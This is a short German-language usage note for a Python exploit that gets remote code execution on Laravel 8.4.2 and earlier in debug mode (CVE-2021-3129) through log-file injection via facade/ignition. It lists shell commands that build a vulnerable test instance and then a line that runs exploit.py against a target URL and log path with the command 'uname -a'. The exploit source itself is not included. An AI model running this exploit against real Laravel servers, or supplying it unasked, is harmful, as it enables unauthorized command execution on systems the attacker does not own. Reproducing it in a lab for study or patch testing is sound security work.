
Python-Exploit für Laravel <=8.4.2 Remote-Codeausführung im Debug-Modus (CVE-2021-3129) durch präparierte Logdatei-Injektion über facade/ignition.
git clone https://github.com/laravel/laravel.git
cd laravel
git checkout e849812
composer install
composer require facade/ignition==2.5.1
php artisan serve
python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log 'uname -a'
